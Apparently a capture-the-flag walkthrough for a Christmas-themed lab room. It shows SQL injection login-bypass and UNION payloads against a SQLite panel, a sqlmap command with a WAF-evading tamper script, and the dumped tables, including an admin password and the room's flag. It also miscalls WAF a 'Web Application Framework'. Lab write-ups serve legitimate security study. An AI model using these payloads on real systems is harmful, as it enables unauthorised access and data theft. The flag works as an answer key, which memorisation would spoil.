IP : 10.10.171.76

Portal : 10.10.171.76:8000

Secret panel : http://10.10.171.76:8000/santapanel

Try SQLI : ' or 1==1 --

	We are in
Check for the no. of entries : ' or 1==1 -- : 22 entries


Manual Approach:

Check the tables:
' union select 1,group_concat(tbl_name) FROM sqlite_master WHERE type="table" and tbl_name NOT like "sqlite_%"-- -

Check for the tables : users,sequels,hidden_table

Check for hidden_table

We can also see the flag : ' union select 1,flag FROM hidden_table-- - : thmfox{All_I_Want_for_Christmas_Is_You}


We can see the admin's password : ' union select username,password FROM users-- - : EhCNSWzzFP6sc7gB


Automatic Approach : 

	Save the request using burp.
	Use the request with sqlmap : sqlmap --dbms sqlite -r session_request --tamper=space2comment --dump all | tee sqldump.txt
		--tamper=space2comment : to bypass WAF(Web Application Framework)

We get the data dumps :
	
Database: SQLite_masterdb                                                                                                                                                                                                                  
Table: sequels                                                                                                                                                                                                                             
[22 entries]                                                                                                                                                                                                                               
+-------------+-----+----------------------------+                                                                                                                                                                                         
| kid         | age | title                      |                                                                                                                                                                                         
+-------------+-----+----------------------------+                                                                                                                                                                                         
| James       | 8   | shoes                      |                                                                                                                                                                                         
| John        | 4   | skateboard                 |
| Robert      | 17  | iphone                     |
| Michael     | 5   | playstation                |
| William     | 6   | xbox                       |
| David       | 6   | candy                      |
| Richard     | 9   | books                      |
| Joseph      | 7   | socks                      |
| Thomas      | 10  | 10 McDonalds meals         |
| Charles     | 3   | toy car                    |
| Christopher | 8   | air hockey table           |
| Daniel      | 12  | lego star wars             |
| Matthew     | 15  | bike                       |
| Anthony     | 3   | table tennis               |
| Donald      | 4   | fazer chocolate            |
| Mark        | 17  | wii                        |
| Paul        | 9   | github ownership           |
| James       | 8   | finnish-english dictionary |
| Steven      | 11  | laptop                     |
| Andrew      | 16  | rasberry pie               |
| Kenneth     | 19  | TryHackMe Sub              |
| Joshua      | 12  | chair                      |
+-------------+-----+----------------------------+


Database: SQLite_masterdb
Table: users
[1 entry]
+------------------+----------+
| password         | username |
+------------------+----------+
| EhCNSWzzFP6sc7gB | admin    |
+------------------+----------+


Database: SQLite_masterdb
Table: hidden_table
[1 entry]
+-----------------------------------------+
| flag                                    |
+-----------------------------------------+
| thmfox{All_I_Want_for_Christmas_Is_You} |
+-----------------------------------------+


